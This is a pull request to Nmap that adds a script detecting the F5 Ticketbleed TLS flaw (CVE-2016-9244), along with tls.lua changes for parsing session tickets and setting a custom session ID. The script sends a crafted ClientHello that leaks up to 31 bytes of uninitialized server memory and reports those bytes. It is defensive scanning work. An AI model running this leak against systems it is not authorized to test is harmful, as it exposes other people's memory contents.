### PR TITLE
Ticketbleed

### DIFF
--- a/nselib/tls.lua
+++ b/nselib/tls.lua
@@ -1180,6 +1180,14 @@ handshake_parse = {
 
         return b, j
       end,
+
+      NewSessionTicket = function (buffer, j, msg_end, protocol)
+        local b = {}
+        -- Parse body.
+        b.ticket_lifetime_hint, b.ticket, j = unpack(">I4 s2", buffer, j)
+
+        return b, j
+      end,
 }
 
 message_parse = {

--- a/nselib/tls.lua
+++ b/nselib/tls.lua
@@ -1182,6 +1182,12 @@ handshake_parse = {
       end,
 
       NewSessionTicket = function (buffer, j, msg_end, protocol)
+        -- Need 4 bytes for parsing.
+        local have = #buffer - j + 1
+        if have < 4 then
+          return nil, j, 4
+        end
+
         local b = {}
         -- Parse body.
         b.ticket_lifetime_hint, b.ticket, j = unpack(">I4 s2", buffer, j)

--- a/nselib/tls.lua
+++ b/nselib/tls.lua
@@ -1274,11 +1274,13 @@ end
 ---
 -- Read a SSL/TLS record
 -- @param buffer   The read buffer
--- @param i        The position in the buffer to start reading
+-- @param i        The position in the buffer to start reading (default: 1)
 -- @param fragment Message fragment left over from previous record (nil if none)
 -- @return The current position in the buffer
 -- @return The record that was read, as a table
 function record_read(buffer, i, fragment)
+  i = i or 1
+
   -- Ensure we have enough data for the header.
   if #buffer - i < TLS_RECORD_HEADER_LENGTH then
     return i, nil
@@ -1395,7 +1397,8 @@ function client_hello(t)
   table.insert(b, stdnse.generate_random_string(28))
 
   -- Set the session ID.
-  table.insert(b, '\0')
+  local sid = t["session_id"] or ""
+  table.insert(b, pack(">s1", sid))
 
   -- Cipher suites.
   ciphers = {}

--- a/scripts/ssl-ticketbleed.nse
+++ b/scripts/ssl-ticketbleed.nse
@@ -166,7 +166,7 @@ local function is_vuln(host, port, version)
     for _, body in ipairs(record.body) do
       stdnse.debug1("Captured %s record.", body.type)
       if body.type == "NewSessionTicket" then
-        ticket = body.data
+        ticket = body.ticket
         break
       end
     end

--- a/scripts/ssl-ticketbleed.nse
+++ b/scripts/ssl-ticketbleed.nse
@@ -1,0 +1,327 @@
+local bin = require("bin")
+local match = require("match")
+local nmap = require("nmap")
+local packet = require "packet"
+local shortport = require("shortport")
+local sslcert = require("sslcert")
+local stdnse = require("stdnse")
+local table = require("table")
+local vulns = require("vulns")
+
+local have_tls, tls = pcall(require,"tls")
+assert(have_tls, "This script requires the tls.lua library from https://nmap.org/nsedoc/lib/tls.html")
+
+description = [[
+Detects whether a server is vulnerable to the F5 Ticketbleed bug (CVE-2016-9244).
+
+For additional information:
+* https://filippo.io/Ticketbleed/
+* https://blog.filippo.io/finding-ticketbleed/
+* https://support.f5.com/csp/article/K05121675
+]]
+
+---
+-- @usage
+-- nmap -p 443 --script ssl-ticketbleed <target>
+--
+-- @output
+-- PORT    STATE SERVICE
+-- 443/tcp open  https
+-- | ssl-ticketbleed:
+-- |   VULNERABLE:
+-- |   Ticketbleed is a serious issue in products manufactured by F5, a popular vendor of TLS load-balancers. The issue allows for stealing information from the load balancer
+-- |     State: VULNERABLE
+-- |     Risk factor: High
+-- |       Ticketbleed is vulnerability in the implementation of the TLS SessionTicket extension found in some F5 products. It allows the leakage ("bleeding") of up to 31 bytes of data from unin
+-- itialized memory. This is caused by the TLS stack padding a Session ID, passed from the client, with data to make it 32-bits long.
+-- |
+-- |     References:
+-- |       https://filippo.io/Ticketbleed/
+-- |       https://blog.filippo.io/finding-ticketbleed/
+-- |_      https://support.f5.com/csp/article/K05121675
+--
+-- @args ssl-ticketbleed.protocols (default tries all) TLS 1.0, TLS 1.1, or TLS 1.2
+
+author = "Mak Kolybabi <mak@kolybabi.com>"
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = {"vuln", "safe"}
+
+portrule = function(host, port)
+  return shortport.ssl(host, port) or sslcert.getPrepareTLSWithoutReconnect(port)
+end
+
+local function is_vuln(host, port, version)
+  -- Checking a host requires a valid TLS Session Ticket. The Nmap API
+  -- does not expose that information to us, but it is sent
+  -- unencrypted near the end of the TLS handshake.
+  --
+  -- First we must create a socket that is ready to start a TLS
+  -- connection, so that we may find the local port from which it is
+  -- sending, and can use that information to filter the PCAP.
+  --
+  -- We should have a way to specify version here, but we don't.
+  local socket
+  local starttls = sslcert.getPrepareTLSWithoutReconnect(port)
+  if starttls then
+    local status
+    status, socket = starttls(host, port)
+    if not status then
+      stdnse.debug3("StartTLS connection to server failed: %s", socket)
+      return
+    end
+  else
+    socket = nmap.new_socket()
+    local status, err = socket:connect(host, port, "tcp")
+    if not status then
+      stdnse.debug3("Connection to server failed: %s", err)
+      return
+    end
+  end
+
+  socket:set_timeout(5000)
+
+  -- Find out the port we'll be using in our TLS negotiation.
+  local status, _, lport = socket:get_info()
+  if( not(status) ) then
+    stdnse.debug3("Failed to retrieve local port used by socket.")
+    return
+  end
+
+  -- We are only interested in capturing the TLS responses from the
+  -- server, not our traffic. We need to set the snaplen to be fairly
+  -- large to accommodate packets with many or large certificates/
+  local filter = ("src host %s and tcp and src port %d and dst port %d"):format(host.ip, port.number, lport)
+  local pcap = nmap.new_socket()
+  pcap:set_timeout(5)
+  pcap:pcap_open(host.interface, 4096, false, filter)
+
+  -- Initiate the TLS negotiation on the already-connected socket, and
+  -- then immediately close the socket.
+  local status, err = socket:reconnect_ssl()
+  if not status then
+    stdnse.debug1("Can't connect with TLS: %s", err)
+    return
+  end
+  socket:close()
+
+  -- Repeatedly read previously-captured packets and add them to a
+  -- buffer.
+  local buf = {}
+  while true do
+    local status, _, _, layer3, _ = pcap:pcap_receive()
+    if not status then
+      break
+    end
+
+    -- Parse captured packet and extract data.
+    local pkt = packet.Packet:new(layer3, #layer3)
+    if not pkt then
+      stdnse.debug3("Failed to create packet from captured data.")
+      return
+    end
+
+    if not pkt:tcp_parse() then
+      stdnse.debug3("Failed to parse captured packet.")
+      return
+    end
+
+    local tls_data = pkt:raw(pkt.tcp_data_offset)
+    table.insert(buf, tls_data)
+  end
+
+  buf = table.concat(buf, "")
+
+  pcap:pcap_close()
+  pcap:close()
+
+  -- Attempt to find the NewSessionTicket record in the captured
+  -- packets.
+  local pos, ticket
+  repeat
+    -- Attempt to parse the buffer.
+    local record
+    pos, record = tls.record_read(buf, pos)
+    if not record then
+      break
+    end
+    if record.type ~= "handshake" then
+      break
+    end
+
+    -- Search for the NewSessionTicket record, which contains the
+    -- Session Ticket we need.
+    for _, body in ipairs(record.body) do
+      stdnse.debug1("Captured %s record.", body.type)
+      if body.type == "NewSessionTicket" then
+        ticket = body.data
+        break
+      end
+    end
+  until pos > #buf
+
+  if not ticket then
+    stdnse.debug1("Server did not send a NewSessionTicket record.")
+    return
+  end
+
+  -- Create the ClientHello record that triggers the behaviour in
+  -- affected systems. The record must include both a Session ID and a
+  -- TLS Session Ticket extension.
+  --
+  -- Setting the Session ID to a single byte allows for the remaining
+  -- 31 bytes of the field to be filled with uninitialized memory when
+  -- it is echoed back in the ServerHelloDone record.
+  local hello = tls.client_hello({
+    ["protocol"] = version,
+    ["session_id"] = "\x01",
+    -- Claim to support every cipher
+    -- Doesn't work with IIS, but only F5 products should be affected
+    ["ciphers"] = stdnse.keys(tls.CIPHERS),
+    ["compressors"] = {"NULL"},
+    ["extensions"] = {
+      -- Claim to support every elliptic curve
+      --["elliptic_curves"] = tls.EXTENSION_HELPERS["elliptic_curves"](stdnse.keys(tls.ELLIPTIC_CURVES)),
+      -- Claim to support every EC point format
+      --["ec_point_formats"] = tls.EXTENSION_HELPERS["ec_point_formats"](stdnse.keys(tls.EC_POINT_FORMATS)),
+      ["SessionTicket TLS"] = ticket,
+    },
+  })
+
+  -- Connect the socket so that it is ready to start a TLS session.
+  if starttls then
+    local status
+    status, socket = starttls(host, port)
+    if not status then
+      stdnse.debug3("StartTLS connection to server failed: %s", socket)
+      return
+    end
+  else
+    socket = nmap.new_socket()
+    local status, err = socket:connect(host, port, "tcp")
+    if not status then
+      stdnse.debug3("Connection to server failed: %s", err)
+      return
+    end
+  end
+
+  -- Send Client Hello to the target server.
+  local status, err = socket:send(hello)
+  if not status then
+    stdnse.debug1("Couldn't send Client Hello: %s", err)
+    socket:close()
+    return
+  end
+
+  -- Read responses from server.
+  local status, response, err = tls.record_buffer(socket)
+  socket:close()
+  if err == "TIMEOUT" then
+    stdnse.debug1("Timeout exceeded waiting for Server Hello Done.")
+    return
+  end
+  if not status then
+    stdnse.debug1("Couldn't receive: %s", err)
+    socket:close()
+    return
+  end
+
+  -- Attempt to parse the response.
+  local _, record = tls.record_read(response)
+  if record == nil then
+    stdnse.debug1("Unrecognized response from server.")
+    return
+  end
+  if record.protocol ~= version then
+    stdnse.debug1("Server responded with a different protocol than we requested: %s", record.protocol)
+    return
+  end
+  if record.type ~= "handshake" then
+    stdnse.debug1("Server failed to respond with a handshake record: %s", record.type)
+    return
+  end
+
+  -- Search for the ServerHello record, which contains the Session ID
+  -- we want.
+  local accepted, sid
+  for _, body in ipairs(record.body) do
+    if body.type == "server_hello" then
+      accepted = body.extensions and body.extensions["SessionTicket TLS"]
+      sid = body.session_id
+    end
+  end
+
+  if not sid then
+    stdnse.debug1("Failed to receive a Server Hello record.")
+    return
+  end
+
+  if not accepted then
+    stdnse.debug1("Server did not accept our Session Ticket.")
+    return
+  end
+
+  -- Check whether the Session ID matches what we originally sent,
+  -- which should be the case for a properly-functioning TLS stacks.
+  if sid == "\x01" then
+    stdnse.debug1("Server properly echoed our single-byte session ID.")
+    return
+  end
+
+  -- Check whether the Session ID matches what we originally sent,
+  -- which should be the case for a properly-functioning TLS stacks.
+  if sid == "" then
+    stdnse.debug1("Server responded with an empty session ID.")
+    return
+  end
+
+  -- We should receive the byte we sent out back as the start of the
+  -- session ID.
+  if sid:byte(1) ~= 1 then
+    stdnse.debug1("Server unexpectedly responded with entirely new session ID: %s", stdnse.tohex(sid, {separator = ":"}))
+    return
+  end
+
+  stdnse.debug3("Server responded with the session ID: %s", stdnse.tohex(sid, {separator = ":"}))
+
+  return true
+end
+
+action = function(host, port)
+  local vuln_table = {
+    title = "Ticketbleed is a serious issue in products manufactured by F5, a popular vendor of TLS load-balancers. The issue allows for stealing information from the load balancer",
+    state = vulns.STATE.NOT_VULN,
+    risk_factor = "High",
+    description = [[
+Ticketbleed is vulnerability in the implementation of the TLS SessionTicket extension found in some F5 products. It allows the leakage ("bleeding") of up to 31 bytes of data from uninitialized memory. This is caused by the TLS stack padding a Session ID, passed from the client, with data to make it 32-bits long.
+    ]],
+
+    references = {
+      "https://filippo.io/Ticketbleed/",
+      "https://blog.filippo.io/finding-ticketbleed/",
+      "https://support.f5.com/csp/article/K05121675"
+    }
+  }
+
+  -- Accept user-specified protocols.
+--  local vers = stdnse.get_script_args(SCRIPT_NAME .. ".protocols") or {"TLSv1.0", "TLSv1.1", "TLSv1.2"}
+  local vers = stdnse.get_script_args(SCRIPT_NAME .. ".protocols") or {"TLSv1.0"}
+  if type(vers) == "string" then
+    vers = {vers}
+  end
+
+  for _, ver in ipairs(vers) do
+    -- Ensure the protocol version is supported.
+    if nil == tls.PROTOCOLS[ver] then
+      return "\n  Unsupported protocol version: " .. ver
+    end
+
+    -- Check for the presence of the vulnerability.
+    if is_vuln(host, port, ver) then
+      vuln_table.state = vulns.STATE.VULN
+      break
+    end
+  end
+
+  local report = vulns.Report:new(SCRIPT_NAME, host, port)
+  return report:make_output(vuln_table)
+end

--- a/scripts/ssl-ticketbleed.nse
+++ b/scripts/ssl-ticketbleed.nse
@@ -301,9 +301,7 @@ local function is_vuln(host, port, version)
     return
   end
 
-  stdnse.debug3("Server responded with the session ID: %s", stdnse.tohex(sid, {separator = ":"}))
-
-  return true
+  return sid
 end
 
 action = function(host, port)
@@ -335,8 +333,13 @@ Ticketbleed is vulnerability in the implementation of the TLS SessionTicket exte
     end
 
     -- Check for the presence of the vulnerability.
-    if is_vuln(host, port, ver) then
-      vuln_table.state = vulns.STATE.VULN
+    local sid = is_vuln(host, port, ver)
+    if sid then
+      vuln_table.state = vulns.STATE.EXPLOIT
+      vuln_table.exploit_results = {
+        stdnse.tohex(sid:sub(2)),
+        (sid:sub(2):gsub("[^%g ]", "."))
+      }
       break
     end
   end

--- a/scripts/ssl-ticketbleed.nse
+++ b/scripts/ssl-ticketbleed.nse
@@ -342,8 +342,8 @@ Ticketbleed is vulnerability in the implementation of the TLS SessionTicket exte
     if sid then
       vuln_table.state = vulns.STATE.EXPLOIT
       vuln_table.exploit_results = {
-        stdnse.tohex(sid:sub(2)),
-        (sid:sub(2):gsub("[^%g ]", "."))
+        stdnse.tohex(sid:sub(17)),
+        (sid:sub(17):gsub("[^%g ]", "."))
       }
       break
     end

--- a/scripts/ssl-ticketbleed.nse
+++ b/scripts/ssl-ticketbleed.nse
@@ -180,9 +180,9 @@ local function is_vuln(host, port, version)
     ["compressors"] = {"NULL"},
     ["extensions"] = {
       -- Claim to support every elliptic curve
-      --["elliptic_curves"] = tls.EXTENSION_HELPERS["elliptic_curves"](stdnse.keys(tls.ELLIPTIC_CURVES)),
+      ["elliptic_curves"] = tls.EXTENSION_HELPERS["elliptic_curves"](stdnse.keys(tls.ELLIPTIC_CURVES)),
       -- Claim to support every EC point format
-      --["ec_point_formats"] = tls.EXTENSION_HELPERS["ec_point_formats"](stdnse.keys(tls.EC_POINT_FORMATS)),
+      ["ec_point_formats"] = tls.EXTENSION_HELPERS["ec_point_formats"](stdnse.keys(tls.EC_POINT_FORMATS)),
       ["SessionTicket TLS"] = ticket,
     },
   })
@@ -303,8 +303,7 @@ Ticketbleed is vulnerability in the implementation of the TLS SessionTicket exte
   }
 
   -- Accept user-specified protocols.
---  local vers = stdnse.get_script_args(SCRIPT_NAME .. ".protocols") or {"TLSv1.0", "TLSv1.1", "TLSv1.2"}
-  local vers = stdnse.get_script_args(SCRIPT_NAME .. ".protocols") or {"TLSv1.0"}
+  local vers = stdnse.get_script_args(SCRIPT_NAME .. ".protocols") or {"TLSv1.0", "TLSv1.1", "TLSv1.2"}
   if type(vers) == "string" then
     vers = {vers}
   end

--- a/scripts/ssl-ticketbleed.nse
+++ b/scripts/ssl-ticketbleed.nse
@@ -284,6 +284,11 @@ local function is_vuln(host, port, version)
     return
   end
 
+  if sid_new == "" then
+    stdnse.debug1("Server did not respond with a session ID.")
+    return
+  end
+
   -- Check whether the Session ID matches what we originally sent,
   -- which should be the case for a properly-functioning TLS stacks.
   if sid_new == sid_old then

--- a/scripts/ssl-ticketbleed.nse
+++ b/scripts/ssl-ticketbleed.nse
@@ -171,13 +171,18 @@ local function is_vuln(host, port, version)
         else
           -- If someone downloaded this script separately from Nmap,
           -- they are likely to be missing the parsing changes to the
-          -- TLS library.
+          -- TLS library. Try parsing the body inline.
+          if #body.data <= 4 then
+            stdnse.debug1("NewSessionTicket's body was too short to parse: %d bytes", #body.data)
+            return
+          end
+
           _, ticket = (">I4 s2"):unpack(body.data)
         end
         break
       end
     end
-  until pos > #buf
+  until ticket or pos > #buf
 
   if not ticket then
     stdnse.debug1("Server did not send a NewSessionTicket record.")

--- a/scripts/ssl-ticketbleed.nse
+++ b/scripts/ssl-ticketbleed.nse
@@ -47,6 +47,19 @@ license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
 categories = {"vuln", "safe"}
 
 portrule = function(host, port)
+  -- Ensure we have the privileges necessary to run the PCAP operations this
+  -- script depends upon.
+  if not nmap.is_privileged() then
+    nmap.registry[SCRIPT_NAME] = nmap.registry[SCRIPT_NAME] or {}
+    if not nmap.registry[SCRIPT_NAME].rootfail then
+      stdnse.verbose1("Not running due to lack of privileges.")
+    end
+
+    nmap.registry[SCRIPT_NAME].rootfail = true
+
+    return false
+  end
+
   return shortport.ssl(host, port) or sslcert.getPrepareTLSWithoutReconnect(port)
 end
 

--- a/scripts/ssl-ticketbleed.nse
+++ b/scripts/ssl-ticketbleed.nse
@@ -8,7 +8,7 @@ local stdnse = require("stdnse")
 local table = require("table")
 local vulns = require("vulns")
 
-local have_tls, tls = pcall(require,"tls")
+local have_tls, tls = pcall(require, "tls")
 assert(have_tls, "This script requires the tls.lua library from https://nmap.org/nsedoc/lib/tls.html")
 
 description = [[

--- a/scripts/ssl-ticketbleed.nse
+++ b/scripts/ssl-ticketbleed.nse
@@ -102,7 +102,7 @@ local function is_vuln(host, port, version)
 
   -- We are only interested in capturing the TLS responses from the
   -- server, not our traffic. We need to set the snaplen to be fairly
-  -- large to accommodate packets with many or large certificates/
+  -- large to accommodate packets with many or large certificates.
   local filter = ("src host %s and tcp and src port %d and dst port %d"):format(host.ip, port.number, lport)
   local pcap = nmap.new_socket()
   pcap:set_timeout(5)

--- a/scripts/ssl-ticketbleed.nse
+++ b/scripts/ssl-ticketbleed.nse
@@ -166,7 +166,14 @@ local function is_vuln(host, port, version)
     for _, body in ipairs(record.body) do
       stdnse.debug1("Captured %s record.", body.type)
       if body.type == "NewSessionTicket" then
-        ticket = body.ticket
+        if body.ticket then
+          ticket = body.ticket
+        else
+          -- If someone downloaded this script separately from Nmap,
+          -- they are likely to be missing the parsing changes to the
+          -- TLS library.
+          _, ticket = (">I4 s2"):unpack(body.data)
+        end
         break
       end
     end


### PR DESCRIPTION
Made a new script for Ticketbleed, a vuln that was announced within the last several hours. This branch also makes a convenience change to `tls.lua` that can be omitted if undesirable. This script borrows pieces from `ssl-heartbleed.nse` where useful.

Please note that I have not yet found any vulnerable systems, but I believe that with the amount of debugging and testing against unaffected systems that it will correctly flag an affected system. There are many, many guards against false positives.

Let me know if anything needs fixing, I will try to be responsive since this is a particularly 'topical' script.